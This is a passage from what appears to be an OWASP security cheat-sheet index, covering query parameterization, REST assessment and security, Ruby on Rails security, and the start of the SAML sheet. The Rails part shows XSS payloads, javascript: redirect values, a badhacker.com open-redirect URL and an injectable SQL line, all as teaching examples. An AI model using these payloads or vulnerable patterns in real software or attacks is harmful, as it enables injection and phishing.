"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-execute","title":"Stored Procedure Using Bind Variables in SQL Run with EXECUTE","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE AnotherSafeGetBalanceQuery(UserID varchar, Dept varchar)\nAS stmt VARCHAR(400); result NUMBER;\nBEGIN\nstmt := 'SELECT balance FROM accounts_table WHERE user_ID = :1\n            AND department = :2';\nEXECUTE IMMEDIATE stmt INTO result USING UserID, Dept;\nRETURN result;\nEND;\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#sql-server-using-transact-sql","title":"SQL Server using Transact-SQL","text":""},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#normal-stored-procedure_1","title":"Normal Stored Procedure","text":"

No dynamic SQL being created. Parameters passed in to stored procedures are naturally bound to their location within the query without anything special being required:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nSELECT balance FROM accounts_table WHERE user_ID = @UserID AND department = @Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#stored-procedure-using-bind-variables-in-sql-run-with-exec","title":"Stored Procedure Using Bind Variables in SQL Run with EXEC","text":"

Bind variables are used to tell the database that the inputs to this dynamic SQL are 'data' and not possibly code:

PROCEDURE SafeGetBalanceQuery(@UserID varchar(20), @Dept varchar(10)) AS BEGIN\nDECLARE @sql VARCHAR(200)\nSELECT @sql = 'SELECT balance FROM accounts_table WHERE '\n+ 'user_ID = @UID AND department = @DPT'\nEXEC sp_executesql @sql,\n'@UID VARCHAR(20), @DPT VARCHAR(10)',\n@UID=@UserID, @DPT=@Dept\nEND\n
"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html","title":"REST Assessment Cheat Sheet","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#about-restful-web-services","title":"About RESTful Web Services","text":"

Web Services are an implementation of web technology used for machine to machine communication. As such they are used for Inter application communication, Web 2.0 and Mashups and by desktop and mobile applications to call a server.

RESTful web services (often called simply REST) are a light weight variant of Web Services based on the RESTful design pattern. In practice RESTful web services utilizes HTTP requests that are similar to regular HTTP calls in contrast with other Web Services technologies such as SOAP which utilizes a complex protocol.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#key-relevant-properties-of-restful-web-services","title":"Key relevant properties of RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#the-challenge-of-security-testing-restful-web-services","title":"The challenge of security testing RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#how-to-pentest-a-restful-web-service","title":"How to pentest a RESTful web service","text":"

Determine the attack surface through documentation - RESTful pen testing might be better off if some level of white box testing is allowed and you can get information about the service.

This information will ensure fuller coverage of the attack surface. Such information to look for:

Collect full requests using a proxy - while always an important pen testing step, this is more important for REST based applications as the application UI may not give clues on the actual attack surface.

Note that the proxy must be able to collect full requests and not just URLs as REST services utilize more than just GET parameters.

Analyze collected requests to determine the attack surface:

Verify non-standard parameters: in some cases (but not all), setting the value of a URL segment suspected of being a parameter to a value expected to be invalid can help determine if it is a path elements of a parameter. If a path element, the web server will return a 404 message, while for an invalid value to a parameter the answer would be an application level message as the value is legal at the web server level.

Analyzing collected requests to optimize fuzzing - after identifying potential parameters to fuzz, analyze the collected values for each to determine:

Lastly, when fuzzing, don't forget to emulate the authentication mechanism used.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#related-resources","title":"Related Resources","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html","title":"REST Security Cheat Sheet","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

REST (or REpresentational State Transfer) is an architectural style first described in Roy Fielding's Ph.D. dissertation on Architectural Styles and the Design of Network-based Software Architectures.

It evolved as Fielding wrote the HTTP/1.1 and URI specs and has been proven to be well-suited for developing distributed hypermedia applications. While REST is more widely applicable, it is most commonly used within the context of communicating with services via HTTP.

The key abstraction of information in REST is a resource. A REST API resource is identified by a URI, usually a HTTP URL. REST components use connectors to perform actions on a resource by using a representation to capture the current or intended state of the resource and transferring that representation.

The primary connector types are client and server, secondary connectors include cache, resolver and tunnel.

REST APIs are stateless. Stateful APIs do not adhere to the REST architectural style. State in the REST acronym refers to the state of the resource which the API accesses, not the state of a session within which the API is called. While there may be good reasons for building a stateful API, it is important to realize that managing sessions is complex and difficult to do securely.

Stateful services are out of scope of this Cheat Sheet: Passing state from client to backend, while making the service technically stateless, is an anti-pattern that should also be avoided as it is prone to replay and impersonation attacks.

In order to implement flows with REST APIs, resources are typically created, read, updated and deleted. For example, an ecommerce site may offer methods to create an empty shopping cart, to add items to the cart and to check out the cart. Each of these REST calls is stateless and the endpoint should check whether the caller is authorized to perform the requested operation.

Another key feature of REST applications is the use of standard HTTP verbs and error codes in the pursuit or removing unnecessary variation among different services.

Another key feature of REST applications is the use of HATEOAS or Hypermedia As The Engine of Application State. This provides REST applications a self-documenting nature making it easier for developers to interact with a REST service without prior knowledge.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#https","title":"HTTPS","text":"

Secure REST services must only provide HTTPS endpoints. This protects authentication credentials in transit, for example passwords, API keys or JSON Web Tokens. It also allows clients to authenticate the service and guarantees integrity of the transmitted data.

See the Transport Layer Protection Cheat Sheet for additional information.

Consider the use of mutually authenticated client-side certificates to provide additional protection for highly privileged web services.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#access-control","title":"Access Control","text":"

Non-public REST services must perform access control at each API endpoint. Web services in monolithic applications implement this by means of user authentication, authorization logic and session management. This has several drawbacks for modern architectures which compose multiple microservices following the RESTful style.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#jwt","title":"JWT","text":"

There seems to be a convergence towards using JSON Web Tokens (JWT) as the format for security tokens. JWTs are JSON data structures containing a set of claims that can be used for access control decisions. A cryptographic signature or message authentication code (MAC) can be used to protect the integrity of the JWT.

If MACs are used for integrity protection, every service that is able to validate JWTs can also create new JWTs using the same key. This means that all services using the same key have to mutually trust each other. Another consequence of this is that a compromise of any service also compromises all other services sharing the same key. See here for additional information.

The relying party or token consumer validates a JWT by verifying its integrity and claims contained.

Some claims have been standardized and should be present in JWT used for access controls. At least the following of the standard claims should be verified:

As JWTs contain details of the authenticated entity (user etc.) a disconnect can occur between the JWT and the current state of the users session, for example, if the session is terminated earlier than the expiration time due to an explicit logout or an idle timeout. When an explicit session termination event occurs, a digest or hash of any associated JWTs should be submitted to a block list on the API which will invalidate that JWT for any requests until the expiration of the token. See the JSON_Web_Token_for_Java_Cheat_Sheet for further details.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#api-keys","title":"API Keys","text":"

Public REST services without access control run the risk of being farmed leading to excessive bills for bandwidth or compute cycles. API keys can be used to mitigate this risk. They are also often used by organisation to monetize APIs; instead of blocking high-frequency calls, clients are given access in accordance to a purchased access plan.

API keys can reduce the impact of denial-of-service attacks. However, when they are issued to third-party clients, they are relatively easy to compromise.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#restrict-http-methods","title":"Restrict HTTP methods","text":"

In Java EE in particular, this can be difficult to implement properly. See Bypassing Web Authentication and Authorization with HTTP Verb Tampering for an explanation of this common misconfiguration.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-content-types","title":"Validate content types","text":"

A REST request or response body should match the intended content type in the header. Otherwise this could cause misinterpretation at the consumer/producer side and lead to code injection/execution.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-request-content-types","title":"Validate request content types","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#send-safe-response-content-types","title":"Send safe response content types","text":"

It is common for REST services to allow multiple response types (e.g. application/xml or application/json, and the client specifies the preferred order of response types by the Accept header in the request.

Services including script code (e.g. JavaScript) in their responses must be especially careful to defend against header injection attack.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#management-endpoints","title":"Management endpoints","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#error-handling","title":"Error handling","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

There are a number of security related headers that can be returned in the HTTP responses to instruct browsers to act in specific ways. However, some of these headers are intended to be used with HTML responses, and as such may provide little or no security benefits on an API that does not return HTML.

The following headers should be included in all API responses:

Header Rationale Cache-Control: no-store Prevent sensitive information from being cached. Content-Security-Policy: frame-ancestors 'none' To protect against drag-and-drop style clickjacking attacks. Content-Type To specify the content type of the response. This should be application/json for JSON responses. Strict-Transport-Security To require connections over HTTPS and to protect against spoofed certificates. X-Content-Type-Options: nosniff To prevent browsers from performing MIME sniffing, and inappropriately interpreting responses as HTML. X-Frame-Options: DENY To protect against drag-and-drop style clickjacking attacks.

The headers below are only intended to provide additional security when responses are rendered as HTML. As such, if the API will never return HTML in responses, then these headers may not be necessary. However, if there is any uncertainty about the function of the headers, or the types of information that the API returns (or may return in future), then it is recommended to include them as part of a defence-in-depth approach.

Header Example Rationale Content-Security-Policy Content-Security-Policy: default-src 'none' The majority of CSP functionality only affects pages rendered as HTML. Permissions-Policy Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=() This header used to be named Feature-Policy. When browsers heed this header, it is used to control browser features via directives. The example disables features with an empty allowlist for a number of permitted directive names. When you apply this header, verify that the directives are up-to-date and fit your needs. Please have a look at this article for a detailed explanation on how to control browser features. Referrer-Policy Referrer-Policy: no-referrer Non-HTML responses should not trigger additional requests."},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#cors","title":"CORS","text":"

Cross-Origin Resource Sharing (CORS) is a W3C standard to flexibly specify what cross-domain requests are permitted. By delivering appropriate CORS Headers your REST API signals to the browser which domains, AKA origins, are allowed to make JavaScript calls to the REST service.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#sensitive-information-in-http-requests","title":"Sensitive information in HTTP requests","text":"

RESTful web services should be careful to prevent leaking credentials. Passwords, security tokens, and API keys should not appear in the URL, as this can be captured in web server logs, which makes them intrinsically valuable.

OK:

https://example.com/resourceCollection/[ID]/action

https://twitter.com/vanderaj/lists

NOT OK:

https://example.com/controller/123/action?apiKey=a53f435643de32 because API Key is into the URL.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#http-return-code","title":"HTTP Return Code","text":"

HTTP defines status code. When designing REST API, don't just use 200 for success or 404 for error. Always use the semantically appropriate status code for the response.

Here is a non-exhaustive selection of security related REST API status codes. Use it to ensure you return the correct code.

Code Message Description 200 OK Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE. 201 Created The request has been fulfilled and resource created. A URI for the created resource is returned in the Location header. 202 Accepted The request has been accepted for processing, but processing is not yet complete. 301 Moved Permanently Permanent redirection. 304 Not Modified Caching related response that returned when the client has the same copy of the resource as the server. 307 Temporary Redirect Temporary redirection of resource. 400 Bad Request The request is malformed, such as message body format error. 401 Unauthorized Wrong or no authentication ID/password provided. 403 Forbidden It's used when the authentication succeeded but authenticated user doesn't have permission to the request resource. 404 Not Found When a non-existent resource is requested. 405 Method Not Acceptable The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used. 406 Unacceptable The client presented a content type in the Accept header which is not supported by the server API. 413 Payload too large Use it to signal that the request size exceeded the given limit e.g. regarding file uploads. 415 Unsupported Media Type The requested content type is not supported by the REST service. 429 Too Many Requests The error is used when there may be DOS attack detected or the request is rejected due to rate limiting. 500 Internal Server Error An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces. 501 Not Implemented The REST service does not implement the requested operation yet. 503 Service Unavailable The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

Additional information about HTTP return code usage in REST API can be found here and here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html","title":"Ruby on Rails Cheat Sheet","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide quick basic Ruby on Rails security tips for developers. It complements, augments or emphasizes points brought up in the Rails security guide from rails core.

The Rails framework abstracts developers from quite a bit of tedious work and provides the means to accomplish complex tasks quickly and with ease. New developers, those unfamiliar with the inner-workings of Rails, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#items","title":"Items","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Ruby offers a function called \"eval\" which will dynamically build new Ruby code based on Strings. It also has a number of ways to call system commands.

eval(\"ruby code here\")\nsystem(\"os command here\")\n`ls -al /` # (backticks contain os command)\nexec(\"os command here\")\nspawn(\"os command here\")\nopen(\"| os command here\")\nProcess.exec(\"os command here\")\nProcess.spawn(\"os command here\")\nIO.binread(\"| os command here\")\nIO.binwrite(\"| os command here\", \"foo\")\nIO.foreach(\"| os command here\") {}\nIO.popen(\"os command here\")\nIO.read(\"| os command here\")\nIO.readlines(\"| os command here\")\nIO.write(\"| os command here\", \"foo\")\n

While the power of these commands is quite useful, extreme care should be taken when using them in a Rails based application. Usually, its just a bad idea. If need be, an allow-list of possible values should be used and any input should be validated as thoroughly as possible.

The guides from Rails and OWASP contain further information on command injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

Ruby on Rails is often used with an ORM called ActiveRecord, though it is flexible and can be used with other data sources. Typically very simple Rails applications use methods on the Rails models to query data. Many use cases protect for SQL Injection out of the box. However, it is possible to write code that allows for SQL Injection.

name = params[:name]\n@projects = Project.where(\"name like '\" + name + \"'\");\n

The statement is injectable because the name parameter is not escaped.

Here is the idiom for building this kind of statement:

@projects = Project.where(\"name like ?\", \"%#{ActiveRecord::Base.sanitize_sql_like(params[:name])}%\")\n

Use caution not to build SQL statements based on user controlled input. A list of more realistic and detailed examples is here: rails-sqli.org. OWASP has extensive information about SQL Injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross-site Scripting (XSS)","text":"

By default, protection against XSS comes as the default behavior. When string data is shown in views, it is escaped prior to being sent back to the browser. This goes a long way, but there are common cases where developers bypass this protection - for example to enable rich text editing. In the event that you want to pass variables to the front end with tags intact, it is tempting to do the following in your .erb file (ruby markup).

# Wrong! Do not do this!\n<%= raw @product.name %>\n\n# Wrong! Do not do this!\n<%== @product.name %>\n\n# Wrong! Do not do this!\n<%= @product.name.html_safe %>\n\n# Wrong! Do not do this!\n<%= content_tag @product.name %>\n

Unfortunately, any field that uses raw, html_safe, content_tag or similar like this will be a potential XSS target. Note that there are also widespread misunderstandings about html_safe().

This writeup describes the underlying SafeBuffer mechanism in detail. Other tags that change the way strings are prepared for output can introduce similar issues, including content_tag.

content_tag(\"/><script>alert('hack!');</script>\") # XSS example\n# produces: </><script>alert('hack!');</script>><//><script>alert('hack!');</script>>\n

The method html_safe of String is somewhat confusingly named. It means that we know for sure the content of the string is safe to include in HTML without escaping. This method itself is un-safe!

If you must accept HTML content from users, consider a markup language for rich text in an application (Examples include: Markdown and textile) and disallow HTML tags. This helps ensures that the input accepted doesn't include HTML content that could be malicious.

If you cannot restrict your users from entering HTML, consider implementing content security policy to disallow the execution of any JavaScript. And finally, consider using the #sanitize method that lets you list allowed tags. Be careful, this method has been shown to be flawed numerous times and will never be a complete solution.

An often overlooked XSS attack vector for older versions of rails is the href value of a link:

<%= link_to \"Personal Website\", @user.website %>\n

If @user.website contains a link that starts with javascript:, the content will execute when a user clicks the generated link:

<a href=\"javascript:alert('Haxored')\">Personal Website</a>\n

Newer Rails versions escape such links in a better way.

link_to \"Personal Website\", 'javascript:alert(1);'.html_safe()\n# Will generate:\n# \"<a href=\"javascript:alert(1);\">Personal Website</a>\"\n

Using Content Security Policy is one more security measure to forbid execution for links starting with javascript: .

Brakeman scanner helps in finding XSS problems in Rails apps.

OWASP provides more general information about XSS in a top level page: Cross-site Scripting (XSS).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sessions","title":"Sessions","text":"

By default, Ruby on Rails uses a Cookie based session store. What that means is that unless you change something, the session will not expire on the server. That means that some default applications may be vulnerable to replay attacks. It also means that sensitive information should never be put in the session.

The best practice is to use a database based session, which thankfully is very easy with Rails:

Project::Application.config.session_store :active_record_store\n

There is an Session Management Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#authentication","title":"Authentication","text":"

As with all sensitive data, start securing your authentication with enabling TLS in your configuration:

# config/environments/production.rb\n# Force all access to the app over SSL, use Strict-Transport-Security,\n# and use secure cookies\nconfig.force_ssl = true\n

Uncomment the line 3 as above in your configuration.

Generally speaking, Rails does not provide authentication by itself. However, most developers using Rails leverage libraries such as Devise or AuthLogic to provide authentication.

To enable authentication it is possible to use Devise gem.

Install it using:

gem\u00a0'devise'\n

Then install it to the user model:

rails\u00a0generate\u00a0devise:install\n

Next, specify which resources (routes) require authenticated access in routes:

Rails.application.routes.draw do\nauthenticate :user do\nresources :something do  # these resource require authentication\n...\nend\nend\n\ndevise_for :users # sign-up/-in/out routes\n\nroot to: 'static#home' # no authentication required\nend\n

To enforce password complexity, it is possible to use zxcvbn gem. Configure your user model with it:

class User < ApplicationRecord\ndevise :database_authenticatable,\n# other devise features, then\n:zxcvbnable\nend\n

And configure the required password complexity:

# in config/initializers/devise.rb\nDevise.setup do |config|\n# zxcvbn score for devise\nconfig.min_password_score = 4 # complexity score here.\n...\n

You can try out this PoC to learn more about it.

Next, omniauth gem allows for multiple strategies for authentication. Using it one can configure secure authentication with Facebook, LDAP and many other providers. Read on here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#token-authentication","title":"Token Authentication","text":"

Devise usually uses Cookies for authentication.

In the case token authentication is wished instead, it could be implemented with a gem devise_token_auth.

It supports multiple front end technologies, for example angular2-token.

This gem is configured similar to the devise gem itself. It also requires omniauth as a dependency.

#\u00a0token-based\u00a0authentication\ngem\u00a0'devise_token_auth'\ngem\u00a0'omniauth'\n

Then a route is defined:

mount_devise_token_auth_for\u00a0'User',\u00a0at:\u00a0'auth'\n

And the User model is modified accordingly.

These actions can be done with one command:

rails\u00a0g\u00a0devise_token_auth:install\u00a0[USER_CLASS]\u00a0[MOUNT_PATH]\n

You may need to edit the generated migration to avoid unnecessary fields and/or field duplication depending on your use case.

Note: when you use only token authentication, there is no more need in CSRF protection in controllers. If you use both ways: cookies and tokens, the paths where cookies are used for authentication still must be protected from forgery!

There is an Authentication Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#insecure-direct-object-reference-or-forceful-browsing","title":"Insecure Direct Object Reference or Forceful Browsing","text":"

By default, Ruby on Rails apps use a RESTful URI structure. That means that paths are often intuitive and guessable. To protect against a user trying to access or modify data that belongs to another user, it is important to specifically control actions. Out of the gate on a vanilla Rails application, there is no such built-in protection. It is possible to do this by hand at the controller level.

It is also possible, and probably recommended, to consider resource-based access control libraries such as cancancan (cancan replacement) or pundit to do this. This ensures that all operations on a database object are authorized by the business logic of the application.

More general information about this class of vulnerability is in the OWASP Top 10 Page.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#csrf-cross-site-request-forgery","title":"CSRF (Cross Site Request Forgery)","text":"

Ruby on Rails has specific, built-in support for CSRF tokens. To enable it, or ensure that it is enabled, find the base ApplicationController and look for a directive such as the following:

class ApplicationController < ActionController::Base\nprotect_from_forgery\n

Note that the syntax for this type of control includes a way to add exceptions. Exceptions may be useful for APIs or other reasons - but should be reviewed and consciously included. In the example below, the Rails ProjectController will not provide CSRF protection for the show method.

class ProjectController < ApplicationController\nprotect_from_forgery except: :show\n

Also note that by default Rails does not provide CSRF protection for any HTTP GET request.

Note: if you use token authentication only, there is no need to protect from CSRF in controllers like this. If cookie-based authentication is used on some paths, then the protections is still required on them.

There is a top level OWASP page for Cross-Site Request Forgery (CSRF).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#redirects-and-forwards","title":"Redirects and Forwards","text":"

Web applications often require the ability to dynamically redirect users based on client-supplied data. To clarify, dynamic redirection usually entails the client including a URL in a parameter within a request to the application. Once received by the application, the user is redirected to the URL specified in the request.

For example:

http://www.example.com/redirect?url=http://www.example_commerce_site.com/checkout

The above request would redirect the user to http://www.example.com/checkout. The security concern associated with this functionality is leveraging an organization's trusted brand to phish users and trick them into visiting a malicious site, in our example, badhacker.com.

Example:

http://www.example.com/redirect?url=http://badhacker.com

The most basic, but restrictive protection is to use the :only_path option. Setting this to true will essentially strip out any host information. However, the :only_path option must be part of the first argument. If the first argument is not a hash table, then there is no way to pass in this option. In the absence of a custom helper or allow list, this is one approach that can work:

begin\nif path = URI.parse(params[:url]).path\nredirect_to path\nend\nrescue URI::InvalidURIError\nredirect_to '/'\nend\n

If matching user input against a list of approved sites or TLDs against regular expression is a must, it makes sense to leverage a library such as URI.parse() to obtain the host and then take the host value and match it against regular expression patterns. Those regular expressions must, at a minimum, have anchors or there is a greater chance of an attacker bypassing the validation routine.

Example:

require 'uri'\nhost = URI.parse(\"#{params[:url]}\").host\n# this can be vulnerable to javascript://trusted.com/%0Aalert(0)\n# so check .scheme and .port too\nvalidation_routine(host) if host\ndef validation_routine(host)\n# Validation routine where we use  \\A and \\z as anchors *not* ^ and $\n# you could also check the host value against an allow list\nend\n

Also blind redirecting to user input parameter can lead to XSS.

Example code:

redirect_to params[:to]\n

Will give this URL:

http://example.com/redirect?to[status]=200&to[protocol]=javascript:alert(0)//

The obvious fix for this type of vulnerability is to restrict to specific Top-Level Domains (TLDs), statically define specific sites, or map a key to it's value.

Example code:

ACCEPTABLE_URLS = {\n'our_app_1' => \"https://www.example_commerce_site.com/checkout\",\n'our_app_2' => \"https://www.example_user_site.com/change_settings\"\n}\n

Will give this URL:

http://www.example.com/redirect?url=our_app_1

Redirection handling code:

def redirect\nurl = ACCEPTABLE_URLS[\"#{params[:url]}\"]\nredirect_to url if url\nend\n

There is a more general OWASP resource about unvalidated redirects and forwards.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#dynamic-render-paths","title":"Dynamic Render Paths","text":"

In Rails, controller actions and views can dynamically determine which view or partial to render by calling the render method. If user input is used in or for the template name, an attacker could cause the application to render an arbitrary view, such as an administrative page.

Care should be taken when using user input to determine which view to render. If possible, avoid any user input in the name or path to the view.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":"

Occasionally, a need arises to share resources with another domain. For example, a file-upload function that sends data via an AJAX request to another domain. In these cases, the same-origin rules followed by web browsers must be sent. Modern browsers, in compliance with HTML5 standards, will allow this to occur but in order to do this; a couple precautions must be taken.

When using a nonstandard HTTP construct, such as an atypical Content-Type header, for example, the following applies:

The receiving site should list only those domains allowed to make such requests as well as set the Access-Control-Allow-Origin header in both the response to the OPTIONS request and POST request. This is because the OPTIONS request is sent first, in order to determine if the remote or receiving site allows the requesting domain. Next, a second request, a POST request, is sent. Once again, the header must be set in order for the transaction to be shown as successful.

When standard HTTP constructs are used:

The request is sent and the browser, upon receiving a response, inspects the response headers in order to determine if the response can and should be processed.

Allow list in Rails:

Gemfile:

gem\u00a0'rack-cors',\u00a0:require\u00a0=>\u00a0'rack/cors'\n

config/application.rb:

module Sample\nclass Application < Rails::Application\nconfig.middleware.use Rack::Cors do\nallow do\norigins 'someserver.example.com'\nresource %r{/users/\\d+.json},\n:headers => ['Origin', 'Accept', 'Content-Type'],\n:methods => [:post, :get]\nend\nend\nend\nend\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#security-related-headers","title":"Security-related headers","text":"

To set a header value, simply access the response.headers object as a hash inside your controller (often in a before/after_filter).

response.headers['X-header-name']\u00a0=\u00a0'value'\n

Rails provides the default_headers functionality that will automatically apply the values supplied. This works for most headers in almost all cases.

ActionDispatch::Response.default_headers = {\n'X-Frame-Options' => 'SAMEORIGIN',\n'X-Content-Type-Options' => 'nosniff',\n'X-XSS-Protection' => '0'\n}\n

Strict transport security is a special case, it is set in an environment file (e.g. production.rb)

config.force_ssl\u00a0=\u00a0true\n

For those not on the edge, there is a library (secure_headers) for the same behavior with content security policy abstraction provided. It will automatically apply logic based on the user agent to produce a concise set of headers.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do code review, pair program and write unit tests.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#attack-surface","title":"Attack Surface","text":"

Generally speaking, Rails avoids open redirect and path traversal types of vulnerabilities because of its /config/routes.rb file which dictates what URLs should be accessible and handled by which controllers. The routes file is a great place to look when thinking about the scope of the attack surface.

An example might be as follows:

#\u00a0this\u00a0is\u00a0an\u00a0example\u00a0of\u00a0what\u00a0NOT\u00a0to\u00a0do\nmatch\u00a0':controller(/:action(/:id(.:format)))'\n

In this case, this route allows any public method on any controller to be called as an action. As a developer, you want to make sure that users can only reach the controller methods intended and in the way intended.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sensitive-files","title":"Sensitive Files","text":"

Many Ruby on Rails apps are open source and hosted on publicly available source code repositories. Whether that is the case or the code is committed to a corporate source control system, there are certain files that should be either excluded or carefully managed.

/config/database.yml\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0production\u00a0credentials.\n/config/initializers/secret_token.rb\u00a0-\u00a0\u00a0Contains\u00a0a\u00a0secret\u00a0used\u00a0to\u00a0hash\u00a0session\u00a0cookie.\n/db/seeds.rb\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0seed\u00a0data\u00a0including\u00a0bootstrap\u00a0admin\u00a0user.\n/db/development.sqlite3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0real\u00a0data.\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#encryption","title":"Encryption","text":"

Rails uses OS encryption. Generally speaking, it is always a bad idea to write your own encryption.

Devise by default uses bcrypt for password hashing, which is an appropriate solution.

Typically, the following config causes the 10 stretches for production: /config/initializers/devise.rb

config.stretches\u00a0=\u00a0Rails.env.test?\u00a0?\u00a01\u00a0:\u00a010\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#updating-rails-and-having-a-process-for-updating-dependencies","title":"Updating Rails and Having a Process for Updating Dependencies","text":"

In early 2013, a number of critical vulnerabilities were identified in the Rails Framework. Organizations that had fallen behind current versions had more trouble updating and harder decisions along the way, including patching the source code for the framework itself.

An additional concern with Ruby applications in general is that most libraries (gems) are not signed by their authors. It is literally impossible to build a Rails based project with libraries that come from trusted sources. One good practice might be to audit the gems you are using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of response:

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#tools","title":"Tools","text":"

Use brakeman, an open source code analysis tool for Rails applications, to identify many potential issues. It will not necessarily produce comprehensive security findings, but it can find easily exposed issues. A great way to see potential issues in Rails is to review the brakeman documentation of warning types.

A newer alternative is bearer, an open source code security and privacy analysis tool for both Ruby and JavaScript/TypeScript code, in order to identify a broad range of OWASP Top 10 potential issues. It provides many configuration options and can easily integrate into your CI/CD pipeline.

There are emerging tools that can be used to track security issues in dependency sets, like automated scanning from GitHub and GitLab.

Another area of tooling is the security testing tool Gauntlt which is built on cucumber and uses gherkin syntax to define attack files.

Launched in May 2013 and very similar to brakeman scanner, the dawnscanner rubygem is a static analyzer for security issues that work with Rails, Sinatra and Padrino web applications. Version 1.6.6 has more than 235 ruby specific CVE security checks.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html","title":"SAML Security Cheat Sheet","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Security Assertion Markup Language (SAML) is an open standard for exchanging authorization and authentication information. The Web Browser SAML/SSO Profile with Redirect/POST bindings is one of the most common SSO implementation. This cheatsheet will focus primarily on that profile.
